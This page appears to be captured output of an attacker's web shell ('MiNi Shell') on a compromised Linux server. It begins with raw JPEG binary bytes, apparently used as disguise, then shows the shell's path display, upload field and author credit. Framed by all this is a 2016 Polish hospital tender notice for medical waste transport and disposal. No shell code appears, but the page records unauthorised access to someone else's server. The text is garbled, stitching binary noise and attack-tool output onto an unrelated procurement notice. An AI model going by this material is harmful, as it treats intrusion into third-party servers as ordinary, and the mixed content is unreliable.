JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160121/7941-N-2016.html

<p class="kh_header"><b>Nowy Tomyśl: USŁUGA ODBIORU, TRANSPORTU I UNIESZKODLIWIANIA ODPADÓW  MEDYCZNYCH</b><br>
<b>Numer ogłoszenia: 7941 - 2016; data zamieszczenia: 21.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej imienia doktora Kazimierza Hołogi , ul. Poznańska 30, 64-300 Nowy Tomyśl, woj. wielkopolskie, tel. 061 4427314, 4427311, faks 061 4422152.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA ODBIORU, TRANSPORTU I UNIESZKODLIWIANIA ODPADÓW  MEDYCZNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie usługi odbioru, transportu i unieszkodliwiania odpadów medycznych  powstających w SP ZOZ w Nowym Tomyślu ul. Sienkiewicza 3 oraz w Zakładzie Opiekuńczo - Leczniczym ul. 27 Grudnia 2, 64-330 Opalenica.
2. Szacunkowa ilość odpadów medycznych do odbioru i unieszkodliwienia w okresie 12 miesięcy wynosi ok. 38.000 kg. Ilość odpadów uzależniona jest od ilości pacjentów oraz ilości wykonywanych zabiegów.
3. Wykonawca udostępni Zamawiającemu pojemniki (kontenery) na odpady medyczne zamykane w sposób uniemożliwiający otwarcie przez osoby nieupoważnione w ilości dostosowanej do potrzeb Zamawiającego, nie mniejszej niż:
a) 3 szt. o pojemności 660 l każdy oraz 2 zamykane pojemniki na części ciała i organy o pojemności dostosowanej do wielkości zamrażarki Zamawiającego (tj. średnicy ok. 36 cm i wysokości ok. 50 cm) do Szpitala Powiatowego w Nowym Tomyślu ul. Sienkiewicza 3;
b) 1 szt. o pojemności  240 l. do Zakładu Opiekuńczo Leczniczego w Opalenicy ul. 27 Grudnia 2.
4. Wykonawca dokonując odbioru odpadów przywiezie taką samą ilość czystych kontenerów na wymianę. Pojemniki stanowią własność Wykonawcy i są przekazane Zamawiającemu w użytkowanie. Użytkowanie pojemników przez okres trwania umowy ujęte jest w cenie ofertowej i nie może rodzić żadnych dodatkowych kosztów dla Zamawiającego. 
5. Wykonawca jest odpowiedzialny za bezpłatną dezynfekcję pojemników przeznaczonych na gromadzenie odpadów. Dezynfekcja powinna odbywać się po każdym odbiorze odpadów z pomieszczenia. Do oferty należy dołączyć kartę charakterystyki środka przeznaczonego do dezynfekcji powierzchni, działającego nie dłużej niż 15 min. Preparat ma wykazywać skuteczność bójczą w obciążeniu materiałem biologicznym. Zakres działania: bakterie, wirusy, grzyby, prątki (szerokie spektrum działania).
6. Odbiór, transport i unieszkodliwianie odpadów medycznych musi odbywać się zgodnie z obowiązującymi przepisami w tym zakresie, szczególnie z ustawą z 14 grudnia 2012r. o odpadach (Dz. U. z 2012r., poz. 21) oraz Rozporządzeniem Ministra Zdrowia z dnia 30 lipca 2010 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz.U. z 2010 r. nr 139, poz. 940).
7. Odbiór odpadów odbywać się będzie z pomieszczenia wyznaczonego w Szpitalu Powiatowym w Nowym Tomyślu oraz w Zakładzie Opiekuńczo - Leczniczym na gromadzenie odpadów medycznych z następującą częstotliwością: 
- odpady medyczne: trzy razy w tygodniu - poniedziałek, środa, piątek i w razie potrzeby na zgłoszenie telefoniczne Zamawiającego, w godz. 8.00 -14.00,
- przeterminowane leki ok. 3-4 razy w roku. 
- chemikalia: ok. 3-4 razy w roku
W przypadku kumulacji dni wolnych Wykonawca zapewni dodatkowy odbiór odpadów.
8. Transport musi odbywać się pojazdami przystosowanymi do transportu odpadów niebezpiecznych posiadającymi w tym względzie wszelkie upoważnienia zgodnie z ustawą z dnia 19 sierpnia 2011r. o przewozie towarów niebezpiecznych ( Dz. U. z 2011r. Nr 227, poz. 1367 ze zm.).
9. Ważenie odpadów odbywać się będzie każdorazowo na wadze umiejscowionej w samochodzie Wykonawcy w obecności pracownika Wykonawcy i pracownika Zamawiającego. Przed podpisaniem umowy należy dostarczyć dokument poświadczający legalizację wagi. Zamawiający będzie kontrolował aktualność legalizacji wagi w trakcie realizacji umowy.
Zamawiający dopuszcza, aby Wykonawca zaopatrzył Zamawiającego w wagę z atestem, która będzie umieszczona w miejscu składowania odpadów do każdorazowego ustalania masy odbieranych odpadów. (Koszt użyczenia wagi ujęty w cenę oferty)
W przypadku ważenia załadowanych (pełnych) pojemników Wykonawca odliczy każdorazowo wagę pustych pojemników.
10. Zakaźne odpady medyczne muszą być unieszkodliwiane na obszarze województwa wielkopolskiego. Dopuszcza się unieszkodliwianie zakaźnych odpadów medycznych na obszarze innego województwa niż wielkopolskie w najbliższej położonej instalacji w przypadku braku instalacji do unieszkodliwiania tych odpadów na obszarze województwa wielkopolskiego lub gdy istniejące instalacje nie mają wolnych mocy przerobowych.  Dopuszcza się, aby zakaźne odpady medyczne były unieszkodliwiane na obszarze innego województwa niż wielkopolskie, jeżeli odległość od miejsca wytwarzania odpadów (64-300 Nowy Tomyśl ul. Sienkiewicza 3) do miejsca unieszkodliwiania położonego na obszarze innego województwa jest mniejsza niż odległość do miejsca unieszkodliwiania położonego na obszarze województwa wielkopolskiego (zasada bliskości, zgodnie z art. 20 ust. 2, 3 i 5-6 ustawy o odpadach Dz. U. z 2013r. poz. 21).
11. Zakaźne odpady medyczne muszą być unieszkodliwiane w instalacjach spełniających wymagania najlepszej dostępnej techniki lub technologii o których mowa w art. 143 ustawy Prawo ochrony środowiska (Dz. U. z 2013, poz 1232 ) przez termiczne przekształcania w spalarniach odpadów niebezpiecznych zgodnie z art. 95 ust. 2 ustawy o odpadach (art. 95 ust. 3 ustawy o odpadach). 
12. Wykonawca zobowiązany jest do przekazania po każdym odbiorze wypełnionych i podpisanych kart przekazania odpadów z dokładnym oznaczeniem instalacji, w której wykonano unieszkodliwienie z podaniem jej lokalizacji osobno dla każdego kodu, wedle Rozporządzenia Ministra Środowiska z dnia 12 grudnia 2014r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji (Dz. U. z 2014r. poz. 1973), pod rygorem odstąpienia od umowy z przyczyn leżących po stronie Wykonawcy.
13. Zamawiający zgodnie z art. 95 ust. 4 ustawy o odpadach wymaga od Wykonawcy dokumentu potwierdzającego unieszkodliwianie zakaźnych odpadów medycznych przez termiczne przekształcanie. Wykonawca zobowiązany będzie do przedkładania Zamawiającemu w/w dokumentu jeden raz w miesiącu w terminie określonym w Rozporządzeniu Ministra Środowiska w sprawie dokumentu potwierdzającego unieszkodliwienie zakaźnych odpadów medycznych lub zakaźnych odpadów weterynaryjnych z dnia 13 stycznia 2014r. (Dz. U. z 2014 r. poz. 107)tj. do 14 dni od końca miesiąca kalendarzowego, którego dokument dotyczy. Dokument ten będzie stanowił podstawę do zapłaty wynagrodzenia za dany miesiąc Wykonawcy za zrealizowana usługę. W przypadku odpadów medycznych innych niż niebezpieczne, podstawą do zapłaty za fakturę VAT będą poprawnie wypełnione i podpisane karty przekazania odpadu.
14. Rozliczenie wykonanej usługi następować będzie w okresach miesięcznych, po zakończeniu każdego miesiąca, w terminie określonym w ofercie Wykonawcy liczonym od dnia dostarczenia prawidłowo wystawionej faktury (wraz z dokumentem potwierdzającym unieszkodliwienie odpadów medycznych przez termiczne spalanie oraz kart przekazania odpadów).
15. Zaoferowany przez Wykonawcę termin płatności nie może być krótszy niż 30 dni oraz nie może być dłuższy niż 60 dni..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.52.44.00-0, 90.52.40.00-6, 90.52.41.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że posiada decyzje (zezwolenie) właściwego terytorialnie organu na prowadzenie działalności dotyczącej gospodarki odpadami medycznymi objętych przedmiotem zamówieniem w zakresie odbioru, transportu i unieszkodliwiania odpadów zgodnie z  ustawą o odpadach z 14 grudnia 2012 roku (Dz. U. 2013 poz. 21). W przypadku posiadania decyzji na odbiór i transport odpadów objętych przedmiotem zamówienia, należy dostarczyć aktualną umowę z podmiotem prowadzącym działalność w zakresie unieszkodliwiania odpadów (z obszaru województwa wielkopolskiego lub z miejsca najbliżej położonego miejscu, w którym zostały wytworzone) objętych zamówieniem oraz stosowne zezwolenia tego podmiotu na prowadzenie działalności. 
Ocena zostanie dokonana wg formuły spełnia/nie spełnia na podstawie analizy wymaganych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp.
Ocena zostanie dokonana wg formuły spełnia/nie spełnia na podstawie analizy wymaganych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przedmiotowego warunku jeżeli Wykonawca wykaże, że: 
posiada środki transportu - minimum dwa pojazdy, kontenery spełniające wymagania, o których mowa w ustawie z 19 sierpnia 2011 roku o przewozie towarów niebezpiecznych, niepowodujące uciążliwości dla środowiska z uwzględnieniem przepisów ADR  - specjalistyczny transport odpadów (z umieszczonym trwale logo firmy na pojeździe) i wyposażone są w wagę posiadającą legalizację oraz złoży oświadczenie, że osoby , które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - zaświadczenia ADR zgodnie z ustawą z 19 sierpnia 2011 roku o przewozie drogowym towarów niebezpiecznych.
Ocena zostanie dokonana wg formuły spełnia/nie spełnia na podstawie analizy wymaganych dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek powyższy zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp wg wzoru stanowiącego Załącznik Nr 3 do SIWZ. Ocena zostanie dokonana wg formuły spełnia/nie spełnia na podstawie analizy wymaganych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek powyższy zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp wg wzoru stanowiącego Załącznik Nr 3 do SIWZ. Ocena zostanie dokonana wg formuły spełnia/nie spełnia na podstawie analizy wymaganych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) W przypadku gdy umocowanie osoby podpisującej ofertę nie wynika z właściwego rejestru, należy dołączyć pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w tym postępowaniu i zawarcia umowy, podpisane przez osoby do tego umocowane zgodnie z odpisem z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej. b) Formularz ofertowy sporządzony wg wzoru Zamawiającego (Druk OFERTA stanowiący Załącznik nr 1 do SIWZ). c)  Określenie części zamówienia, która będzie wykonana przez Podwykonawcę (dotyczy tylko Wykonawcy, który ma zamiar powierzyć wykonanie części zamówienia Podwykonawcy). d) Wykonawca polegający na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy składa dokumenty dotyczące: - zakresu dostępnych Wykonawcy zasobów innego podmiotu, - sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia, - charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, - zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. e) Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia na podstawie art. 23 Pzp (dotyczy m.in. tzw. konsorcjum), zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy dołączyć stosowne pełnomocnictwo. Pełnomocnictwo może być udzielone w szczególności: - łącznie przez wszystkich Wykonawców (jeden dokument) - oddzielnie przez każdego z nich ( tyle dokumentów ile Wykonawców) - podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników W przypadku, gdy ofertę składa pełnomocnik - stosowne pełnomocnictwo.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.
2. Zamawiający przewiduje możliwość dokonania następujących istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, wynikających z uwzględnienia zapisu art. 142 ust. 5 w związku z art. 144 ust. 1 ustawy Pzp: 
a) zmiana ceny w przypadku zmiany stawki podatku VAT zgodnie z obowiązującymi przepisami, z tym, że cena brutto może ulec zmianie tylko w stopniu wynikającym ze zmiany stawki podatkowej, zaś cena netto pozostaje bez zmian; 
b) zmiana ceny w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 -5 ustawy z dnia 10 października 2002r o minimalnym wynagrodzeniu za pracę (Dz.U. 2002 nr 200 poz. 1679 ), 
c) zmiana ceny w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne 
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. 
3. W przypadku wystąpienia okoliczności o których mowa w ust. 2 lit. b) i c) w celu dokonania zmian zapisów umowy wnioskowanych przez Stronę, zobowiązana jest ona pisemnie wystąpić z  propozycją zmiany wraz z uzasadnieniem. 
4. Wniosek o zmianę powinien być złożony z co najmniej dwutygodniowym wyprzedzeniem licząc od proponowanego terminu wprowadzenia zmian. Winien zawierać proponowaną nową wysokość cen i wycenę zawierającą wyliczenia w niezbędnym zakresie, podstawę prawną itp. 
5. Zamawiający dokona weryfikacji, zbada prawidłowość dokonanej kalkulacji i ma możliwość wystosowania zastrzeżeń do przedłożonych dokumentów. 
6. Zmiany cen wymagają sporządzenia aneksu do umowy za wyjątkiem zmian wynikających z ustawowych zmian stawek podatku od towarów i usług, które podlegają automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w chwili powstawania obowiązku podatkowego, bez konieczności sporządzania aneksu do umowy.
7. Zamawiający dopuszcza w każdej sytuacji zmiany umowy korzystne dla Zamawiającego polegające np. na obniżeniu ceny jednostkowej.
8. Zmiany umowy mogą być dokonane w następujących sytuacjach:
a) nastąpi zmiana organizacyjna po stronie Zamawiającego, w szczególności w zakresie organizacji pracy komórek korzystających z usług objętych umową, bądź;
b) nastąpi zmiana w zakresie liczby pacjentów korzystających ze świadczeń zdrowotnych Zamawiającego, bądź;
c) wymagać tego będzie prawidłowa realizacja przez Zamawiającego zadań polegających na wykonywaniu świadczeń zdrowotnych, bądź;
d) w wyniku zmiany prawa możliwe będzie podniesienie poziomu/jakości świadczeń wykonywanych przez Zamawiającego, bądź;
e) będzie to konieczne ze względu na zapewnienie bezpieczeństwa lub zapobieżenia awarii, bądź;
f) będzie to konieczne ze względu na zmianę przepisów prawa, bądź;
g) zmiana w inny sposób dostarczy pożytku Zamawiającemu.
9. Przewidziane zmiany treści umowy nie mogą być niekorzystne dla Zamawiającego. Brak wyrażenia przez Zamawiającego zgody na proponowaną przez Wykonawcę zmianę treści umowy w trakcie jej obowiązywania nie może prowadzić do rozwiązania umowy przez jednostronną czynność prawną Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-nowytomysl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej imienia doktora Kazimierza Hołogi ul. Poznańska 30, 64-300 Nowy Tomyśl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2016 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej imienia doktora Kazimierza Hołogi ul. Poznańska 30, 64-300 Nowy Tomyśl, budynek I piętro, pokój numer 3- Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com